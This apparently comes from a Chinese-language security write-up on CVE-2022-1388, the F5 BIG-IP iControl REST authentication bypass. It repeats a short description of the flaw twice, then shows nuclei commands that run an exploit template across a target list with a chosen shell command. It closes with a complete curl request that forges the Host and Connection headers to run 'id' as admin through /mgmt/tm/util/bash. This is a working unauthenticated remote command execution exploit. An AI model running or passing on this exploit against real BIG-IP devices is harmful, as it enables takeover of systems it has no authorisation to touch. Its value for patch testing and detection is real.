
CVE-2022-1388 是 BIG-IP 的 iControl API 中 REST 组件的一个身份验证绕过漏洞,其 CVSSv3 评分为 9.8。iControl REST API 用于管理和配置 BIG-IP 设备。使用 BIG-IP 的设备,其管理端口或自身 IP 地址具有网络访问权限的未经身份验证的攻击者可利用 CVE-2022-1388。成功利用该漏洞可让攻击者执行任意系统命令、创建和删除文件以及禁用服务。
CVE-2022-1388 是 BIG-IP iControl API 的 REST 组件中的一个认证绕过漏洞,其 CVSSv3 评分为 9.8。iControl REST API 用于 BIG-IP 设备的管理和配置。CVE-2022-1388 可被未认证的攻击者利用,只要攻击者具备访问使用 BIG-IP 设备的管理端口或 self IP 地址的网络访问权限。成功利用该漏洞后,攻击者可以执行任意系统命令、创建和删除文件以及禁用服务。
该 nuclei 模板接受用于漏洞利用的 shell 参数。 我们想要测试从其他工作流或手动搜索中获取的令牌,因此我们使用 nuclei 的 CLI 变量功能,在运行时动态地向这些模板提供单个令牌值或令牌列表。
-V, -var value custom vars in var=value format
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

curl -su admin \
-H "Host: localhost:8100" \
-H "Content-Type: application/json" \
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \
-H "Authorization: Basic YWRtaW46" \
http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'